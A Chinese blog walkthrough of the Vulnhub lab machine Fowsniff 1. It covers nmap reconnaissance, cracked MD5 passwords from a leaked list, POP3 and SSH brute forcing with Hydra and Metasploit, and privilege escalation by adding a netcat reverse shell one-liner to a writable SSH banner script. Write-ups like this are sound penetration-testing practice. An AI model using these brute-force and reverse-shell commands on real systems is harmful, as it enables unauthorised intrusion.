Vulnhub靶机:FOWSNIFF_ 1

最新推荐文章于 2024-02-17 22:19:37 发布
最新推荐文章于 2024-02-17 22:19:37 发布
阅读量293 收藏 1
点赞数 1
分类专栏: 靶机 文章标签: Vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/129816772
版权

目录

介绍

系列:Fowsniff(此系列共1台)
发布日期:2018 年 9 月 27 日
难度:初级
运行环境:Virtualbox运行成功
目标:取得 root 权限
学习:

  • 主机发现
  • 网站敏感信息泄露
  • POP3、SSH爆破
  • SSH的banner脚本提权

靶机地址:https://www.vulnhub.com/entry/fowsniff-1,262/

信息收集

主机发现

netdiscover主机发现

sudo netdiscover -i eth1 -r 192.168.56.0/24

主机信息探测

nmap -p- 192.168.56.103
nmap -p 22,80,110,143 -A 192.168.56.103
nmap -p 22,80,110,143 --script=vuln 192.168.56.103

在这里插入图片描述

网站探测

访问靶场,看到如下提示
在这里插入图片描述

常规的网站爆破没有任何有趣的发现,根据网站首页提示,直接google一下
在这里插入图片描述

在这里插入图片描述

通过https://raw.githubusercontent.com/berzerk0/Fowsniff/main/fowsniff.txt的信息得知,这些密码是md5加密的,账号用于pop3登录。
找个在线网站,破解得到密码:https://hashes.com/en/decrypt/hash

0e9588cb62f4b6f27e33d449e2ba0b3b:carp4ever
19f5af754c31f1e2651edde9250d69bb:skyler22
1dc352435fecca338acfd4be10984009:apples01
4d6e42f56e127803285a0a7649b5ab11:orlando12
8a28a94a588a95b80163709ab4313aa4:mailcall
90dc16d47114aa13671c697fd506cf26:scoobydoo2
ae1644dac5b77c0cf51e0d26ad6d7e56:bilbo101
f7fd98d380735e859f8b2ffbbede5a7e:07011972

POP3爆破

方式1:Hydra

hydra -L user -P pass pop3://192.168.56.103

在这里插入图片描述

方式2:MSF

use auxiliary/scanner/pop3/pop3_login
set USERPASS_FILE /root/test/user
set PASS_FILE /root/test/pass
set THREADS 10
exploit

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

连接POP3

方式1:foxmail

在第二封邮件中发现了SSH登录密码:S1ck3nBluff+secureshell
image.png
image.png

方式2:nc

这里需要了解一点命令,不知道的话就网上搜一搜

user seina
pass scoobydoo2
stat
list
retr 1

image.png
image.png

SSH爆破

hydra -L user -p S1ck3nBluff+secureshell ssh://192.168.56.103 -v

image.png

提权

查看系统中有哪些文件是当前用户可写的,结果发现了一个有趣的文件“cube.sh”,在首次SSH登录系统的时候曾经看到过它的内容信息

find / -writable 2>/dev/null -ls | grep -v "/proc/" | grep -v "/sys/" | grep -v "systemd" | grep -v "/home/" | grep -v "/dev/" | grep -v "/var/"

image.png
那这个时候提权就很容易了,只需要修改这个文件,然后重新SSH登录即可。在文件中添加如下内容:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.101 1234 >/tmp/f

image.png
image.png

lainwith
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用知识及工具 ssh、sqlmap、suid提权 信息收集并getshell 先看下web页面 感觉平平无奇,先使用dirb和dirmap目录分别进行扫描 dirb
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
ssh执行远程服务器需要sudo提权的脚本
系统运维
01-23 867
前言 运维是件很神奇的工作,牛逼的运维很轻松可以搞定很复杂的任务,sb的运维天天时间都耗上可能也解决不了问题(ps:因为他把时间都花在了可以重复执行的事情上) 在写这篇博客之前,我google了一堆相关文章,大都是说修改/etc/sudoers,然后NOPASSWD:指定的cmd,但是真心不管用,没有远程虚拟终端这个方法就是浮云,ubuntu10.04 server 亲测!! ssh...
Linux ssh命令详解
weixin_30390075的博客
07-05 3422
SSH(远程连接工具)连接原理:ssh服务是一个守护进程(demon),系统后台监听客户端的连接,ssh服务端的进程名为sshd,负责实时监听客户端的请求(IP 22端口),包括公共秘钥等交换等信息。 ssh服务端由2部分组成: openssh(提供ssh服务) openssl(提供加密的程序) ssh的客户端可以用 XSHELL,Securecrt, Mobax...
【甄选靶场Vulnhub百个项目渗透——项目五十二:Fowsniff-1(任务挟持)
人间体佐菲的博客
10-25 983
【甄选靶场Vulnhub百个项目渗透——项目五十二:Fowsniff-1(任务挟持)
vulnhub靶机-FIRSTBLOOD: 1
臭nana的博客
09-25 1682
绪论:这个靶机比较简单,因为每一步都有提示,而且基本命令都给出来了 1、找到靶机ip:192.168.74.130 nmap -sn 192.168.74.0/24 2、扫描靶机端口,得到80端口和60022端口(ssh服务) root@kali:~# nmap -A -p- 192.168.74.130 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.74.130 Host is up (0.000
红队打靶:Fowsniff打靶思路详解(vulnhub
Bossfrank的博客
09-20 552
本文是vulnhub靶机Fowsniff的详细打靶过程。涉及到的知识点包括john密码md5破解、hydra密码碰撞、pop3邮件服务器登录、banner脚本提权等。靶机不难,重在思路,这个靶机涉及的剧情感觉还是非常符合实际情景,值得实操盲打!
vulnhub靶场Fowsniff
kukudeshuo的博客
08-01 289
vulnhub靶场Fowsniff 环境准备 靶机下载地址:https://www.vulnhub.com/entry/fowsniff-1,262/ 攻击机:kali(192.168.109.128) 靶机Fowsniff(192.168.109.148) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.148 使用nmap扫描查看目标靶机端口开
[VulnHub靶机渗透] Fowsniff
最新发布
人若无名,便可专心练剑
02-17 1055
靶机精讲之Fowsniff靶机,涉及诸多信息收集,比如web信息收集、媒体网站信息收集、工具站信息收集、pop3服务器信息收集,还涉及john和hydra密码暴力破解,crackmapexec密码碰撞,ssh的banner脚本提权等,可以到vulnhub下载靶机边看视频边实操,是一台构思精巧、全面磨练日常渗透技能的的高仿真靶机,非常值得学习。
Vulnhub靶机检测不到IP地址
小小猪的博客
06-05 844
Vulnhub靶机检测不到IP地址 一、无法检测问题 从vulnhub下载靶机后,准备做测试时,使用Mac&kali无法检测到靶机的IP,arp-scan、nmap、netdiscover均未检测到靶机的IP地址,因为我们无法获取靶机的IP地址的话就没办法进行下一步。 二、排查 确保攻击机与靶机同处在一个网络环境。应该是网卡服务启动失败。这是导致获取不到IP的罪魁祸首。知道原因就有解决方法了。启动网卡服务!!! 三、解决步骤 因为靶机我们是不知道账号密码的。所以只能通过拯救模式进行操作,
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
vulnhub靶机fowsniff
weixin_53665747的博客
07-21 67
靶机突破点在于发现外网的账号密码泄露,再去登录靶机自身的邮件服务发现ssh密码,然后利用ssh banner提权。
入坑 Hack The Box
LainWith的博客
10-19 9538
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh 官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见: https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请
pikachu靶机学习记录
LainWith的博客
08-11 8390
前言:网上关于pikachu的教程很多,这篇博文最大的意义就是对思路的梳理,这也是“靶机”专栏的一贯特点暴力破解基于表单的暴力破解验证码绕过(on client)验证码绕过(on server)token防爆破? 暴力破解 基于表单的暴力破解 首先随意输入一个用户名和密码,Burpsuite抓包 发现没有验证码及其他限制,可以肆意爆破,由于左上角的提示按钮给出了答案,下面处于演示需求做一个简单爆破。 爆出一个账密:admin:123456 验证码绕过(on client) 首先明确两个概念:验证码一
vulnhub之DC9靶机
LainWith的博客
02-15 3377
目录介绍信息收集主机发现主机信息探测访问网站爆破网站-失败漏扫网站sqlmap注入任意文件读取漏洞SSH爆破信息收集二次SSH爆破提权方式1提权方式2参考 介绍 系列: DC(此系列共10台) 发布日期:2019年12月29日 难度:中级 Flag:获取root权限并读取唯一的Flag 学习: bp联动xray扫描 sql注入 任意文件读取 ssh开门 提权 靶机地址:https://www.vulnhub.com/entry/dc-9,412/ 从靶场得到提示信息: 靶机更适用Virtualbox
Vulnhub靶机:HACKNOS:OS-HACKNOS-2.1
LainWith的博客
02-05 3125
目录介绍信息收集主机发现主机信息探测网站探测目录扫描wpscan漏扫网站测试POC破解用户密码SSH登录破解用户密码Flag1提权-Flag2参考 介绍 系列: hackNos(此系列共7台) 发布日期:2020 年 1 月 18 日 难度:初级-中级 Flag : 2个,一个普通用户的,一个根用户的 学习: wordpress 安全测试 本地包含漏洞利用 john破解 特权提升 靶机地址:https://www.vulnhub.com/entry/hacknos-reconforce,416/ 信息收
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值